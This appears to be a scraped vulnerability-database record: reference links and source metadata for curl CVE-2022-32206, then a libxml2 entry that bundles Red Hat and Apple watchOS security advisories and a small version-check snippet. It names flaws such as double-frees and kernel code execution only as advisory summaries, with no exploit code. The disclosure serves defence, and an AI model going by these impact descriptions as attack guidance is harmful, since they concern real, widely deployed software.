},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3366"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168503/red-hat-security-advisory-2022-6560-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4757"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167607/ubuntu-security-notice-usn-5495-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071152"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3238"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168284/red-hat-security-advisory-2022-6183-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4266"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-32206/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5632"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4468"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4324"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4525"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169443/red-hat-security-advisory-2022-7058-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3117"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-29154"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2526"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36067"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32148"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1705"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5495-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31150"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31151"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6344"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-36067"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24921"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:3460"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6183"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-32206",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168275",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168347",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170083",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170166",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172765",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168284",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-09-27T16:01:00",
"db": "PACKETSTORM",
"id": "168538",
"ident": null
},
{
"date": "2022-09-07T16:50:50",
"db": "PACKETSTORM",
"id": "168275",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-09-13T15:29:12",
"db": "PACKETSTORM",
"id": "168347",
"ident": null
},
{
"date": "2022-12-02T15:57:08",
"db": "PACKETSTORM",
"id": "170083",
"ident": null
},
{
"date": "2022-12-08T21:28:44",
"db": "PACKETSTORM",
"id": "170166",
"ident": null
},
{
"date": "2023-06-06T17:04:24",
"db": "PACKETSTORM",
"id": "172765",
"ident": null
},
{
"date": "2022-09-07T16:57:47",
"db": "PACKETSTORM",
"id": "168284",
"ident": null
},
{
"date": "2022-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"date": "2022-07-07T13:15:08.340000",
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"date": "2025-05-05T17:18:13.120000",
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
}
}
VAR-202210-1070
Vulnerability from variot - Updated: 2026-04-10 23:25. An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked. libxml2 is an XML parsing library written in C that can be called from many other languages, such as C++ and XSH. Currently there is no further information about this vulnerability; watch CNNVD or vendor announcements for updates. Summary:
OpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:
OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests
- JIRA issues fixed (https://issues.jboss.org/):
OADP-1056 - DPA fails validation if multiple BSLs have the same provider OADP-1150 - Handle docker env config changes in the oadp-operator OADP-1217 - update velero + restic to 1.9.5 OADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed OADP-1289 - Restore partially fails with error "Secrets \"deployer-token-rrjqx\" not found" OADP-290 - Remove creation/usage of velero-privileged SCC
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified 2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2023:0338-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0338 Issue date: 2023-01-23 CVE Names: CVE-2022-40303 CVE-2022-40304 ==================================================================== 1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
- libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
- libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
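The affected range for both fixes is "libxml2 before 2.10.3", which can be checked mechanically against an upstream version string. A minimal sketch (the helper names are hypothetical, not part of any advisory tooling; note that distribution builds such as libxml2-2.9.13-3.el9_1 in this advisory backport the fix, so a plain upstream version comparison does not apply to them):

```python
# Hypothetical helpers: compare an upstream libxml2 version string
# against 2.10.3, the first release containing the fixes for
# CVE-2022-40303 and CVE-2022-40304. Distribution packages that
# backport patches (e.g. RHEL's libxml2-2.9.13-3.el9_1) must be
# checked via their errata, not by version number alone.

def parse_version(version: str) -> tuple:
    """Turn a dotted version string like '2.10.3' into (2, 10, 3)."""
    return tuple(int(part) for part in version.split("."))

def upstream_vulnerable(version: str) -> bool:
    """True if an *upstream* libxml2 release predates the 2.10.3 fix."""
    return parse_version(version) < (2, 10, 3)

print(upstream_vulnerable("2.9.13"))   # True
print(upstream_vulnerable("2.10.3"))   # False
```

Tuple comparison handles multi-digit components correctly (so "2.10.3" compares greater than "2.9.13"), which a plain string comparison would get wrong.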
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm libxml2-devel-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm libxml2-devel-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm libxml2-devel-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm libxml2-devel-2.9.13-3.el9_1.i686.rpm libxml2-devel-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: libxml2-2.9.13-3.el9_1.src.rpm
aarch64: libxml2-2.9.13-3.el9_1.aarch64.rpm libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-2.9.13-3.el9_1.ppc64le.rpm libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-2.9.13-3.el9_1.s390x.rpm libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm python3-libxml2-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-2.9.13-3.el9_1.i686.rpm libxml2-2.9.13-3.el9_1.x86_64.rpm libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-40303 https://access.redhat.com/security/cve/CVE-2022-40304 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. Bugs fixed (https://bugzilla.redhat.com/):
2171870 - CVE-2023-0923 odh-notebook-controller-container: Missing authorization allows for file contents disclosure
- JIRA issues fixed (https://issues.jboss.org/):
RHODS-6123 - Update dsp repo to match upstream kfp-tekton repo RHODS-6136 - Verify status of manifests RHODS-6330 - Remove Openvino and Etcd images from quay for self-managed deployments RHODS-6779 - [Model Serving] fallback image for ovms is not published, leading to image pull errors in upgrade scenarios
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2022-12-13-8 watchOS 9.2
watchOS 9.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213536.
Accounts Available for: Apple Watch Series 4 and later Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t)
AppleAVD Available for: Apple Watch Series 4 and later Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov
AppleMobileFileIntegrity Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing
CoreServices Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: Multiple issues were addressed by removing the vulnerable code. CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security
ImageIO Available for: Apple Watch Series 4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t)
IOHIDFamily Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03)
IOMobileFrameBuffer Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom)
iTunes Store Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2022-42837: an anonymous researcher
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero
Kernel Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab
